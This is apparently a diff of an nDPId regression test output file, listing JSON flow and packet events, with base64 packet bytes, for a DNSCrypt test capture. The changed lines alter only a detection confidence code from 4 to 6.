00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRogAL0RA94KAAABKU9FDbSVAbsGBIFBBsIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRkAub0RKLIKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRoAub0RKLEKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRsgAL0RA90KAAABKU9FDdrrAbsGBFrpBsQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpRxAAL0R55sKAAABKU9FDZT4AbsCCDEyBsMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRsAub0RKLAKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR1AAL0R55oKAAABKU9FDdtxAbsCCDEyBsEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR5AAL0R55kKAAABKU9FDallAbsCCDEyBsUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPnjFAADcRIRzR+vEZCgAAAQG7hhQAu13p8VeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739304629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304629,"pkt":"ZmZmZmZmRERERERECABFAADPnjJAADcRIRvR+vEZCgAAAQG75+cAu\/wU8ViBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 